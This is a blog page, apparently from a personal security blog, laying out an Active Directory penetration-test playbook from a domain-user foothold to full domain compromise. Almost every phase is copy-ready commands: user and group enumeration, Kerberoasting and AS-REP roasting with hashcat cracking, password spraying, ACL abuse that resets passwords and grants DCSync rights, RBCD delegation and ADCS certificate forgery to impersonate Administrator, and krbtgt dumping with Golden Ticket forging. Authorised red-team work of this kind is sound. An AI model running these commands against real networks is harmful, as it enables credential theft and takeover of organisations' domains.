gengstah

gengstah

Exploring the spaces between specs — where weird machines live and exploits are born

Playbook: Active Directory Penetration Test

Scope: Full AD domain; assume domain user foothold Prerequisites: Domain user credentials or shell on domain-joined host; BloodHound.py; Impacket; Rubeus MITRE Coverage: T1558.003, T1550.002, T1550.003, T1484, T1484.001, T1078.002

Objective

Achieve Domain Admin (and ideally Enterprise Admin / forest-wide compromise), then demonstrate impact on crown jewels. Map the full attack path.

Steps

Phase 1: Initial Enumeration

# Identify domain info
nxc smb dc01 -u user -p pass --pass-pol
nxc smb dc01 -u user -p pass --users | tee domain_users.txt
nxc smb dc01 -u user -p pass --groups

# LDAP dump
ldapdomaindump -u 'domain\user' -p pass dc01 -o ldapdump/

# BloodHound full collection
bloodhound-python -u user -p pass -d domain.local -dc dc01.domain.local -c All -o bh/

Phase 2: Quick Wins Checklist

# Kerberoastable accounts (SPN set, potentially crackable)
GetUserSPNs.py domain.local/user:pass -dc-ip dc01 -request -outputfile krb.txt
hashcat -m 13100 krb.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule

# AS-REP Roastable (no preauth)
GetNPUsers.py domain.local/user:pass -dc-ip dc01 -request -format hashcat -outputfile asrep.txt
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# Password spraying (verify lockout threshold first)
nxc smb dc01 -u domain_users.txt -p 'Company2024!' --continue-on-success

# Check for local admin across all hosts
nxc smb 10.10.10.0/24 -u user -p pass --local-groups Administrators

# Enumerate ADCS (certificate services — extremely common misconfig)
certipy find -u user@domain.local -p pass -dc-ip dc01 -stdout | grep -E "ESC[0-9]"

Phase 3: BloodHound Attack Path Analysis

  1. Import collection zip into BloodHound.
  2. Mark owned accounts as “Owned.”
  3. Run: “Shortest Paths from Owned Principals to Domain Admins.”
  4. Identify viable paths (ACL abuse, group membership, session hijacking, delegation).
  5. Prioritize by ease: GenericAll > WriteDACL > ForceChangePassword > HasSession.

Phase 4: ACL Abuse

# If GenericAll/GenericWrite over a user → reset their password
net user victimuser NewPass123! /domain
# Or with PowerView:
Set-DomainUserPassword -Identity victimuser -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

# If GenericAll over a group → add yourself
net group "IT Admins" attackeruser /add /domain
Add-DomainGroupMember -Identity "IT Admins" -Members attacker

# If WriteDACL over domain object → grant DCSync rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity attacker -Rights DCSync

Phase 5: Delegation Attacks

# Unconstrained delegation computers (except DCs)
# If compromised: capture TGTs of connecting users via SpoolSample/PetitPotam
# Wait for DC to connect (or force with PrinterBug)
Rubeus.exe monitor /interval:5 /nowrap   # Capture incoming TGTs

# RBCD (Resource-Based Constrained Delegation) — if you have write to computer object
# Step 1: Create fake computer
impacket-addcomputer domain.local/user:pass -computer-name FakePC -computer-pass FakePass123
# Step 2: Set RBCD — allow FakePC to delegate to target
rbcd.py -delegate-from FakePC -delegate-to TargetPC domain.local/user:pass -dc-ip dc01 -action write
# Step 3: Get TGS impersonating DA
getST.py domain.local/FakePC\$:FakePass123 -spn cifs/TargetPC.domain.local -impersonate Administrator -dc-ip dc01
KRB5CCNAME=Administrator.ccache wmiexec.py -k -no-pass domain.local/Administrator@TargetPC.domain.local

Phase 6: ADCS Exploitation

# ESC1: SAN in template, enrollee can specify — forge cert as any user
certipy req -u user@domain.local -p pass -ca 'DOMAIN-CA' -template 'VulnerableTemplate' -upn administrator@domain.local
certipy auth -pfx administrator.pfx -domain domain.local -dc-ip dc01
# Returns NTLM hash and TGT for administrator

Phase 7: Domain Dominance

# DCSync (requires DA or explicit DCSync ACE)
secretsdump.py domain.local/da_user:pass@dc01.domain.local -just-dc-ntlm
# Get KRBTGT hash for Golden Ticket
secretsdump.py domain.local/da_user:pass@dc01.domain.local -just-dc-user krbtgt

# Golden Ticket
ticketer.py -nthash <krbtgt_ntlm> -domain-sid S-1-5-21-xxx -domain domain.local Administrator
KRB5CCNAME=Administrator.ccache nxc smb dc01 -k --use-kcache

# Or Mimikatz Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:<hash> /ptt

Phase 8: Document & Impact

  1. Capture screenshots of every privilege escalation step.
  2. Access crown jewels: sensitive file shares, databases, email.
  3. Note all domain admin accounts, computer accounts compromised.
  4. Document BloodHound attack path for the report.

Cleanup / Deconfliction

  • Remove added group memberships.
  • Revert ACL changes.
  • Delete fake computer accounts (if RBCD used).
  • Remove Golden Tickets from sessions (kerberos::purge).
  • Communicate critical findings immediately.

Notes & Gotchas

  • Always verify password lockout threshold before spraying (default is often 10 attempts).
  • ADCS ESC attacks require the CA to have ENROLLEEUSESSUPPLIEDSUBJECT flag — certipy find shows this.
  • Forest trust attacks require child domain DA first, then ExtraSid abuse to reach parent.
  • Constrained delegation with protocol transition (S4U2Self + S4U2Proxy) allows impersonating any user.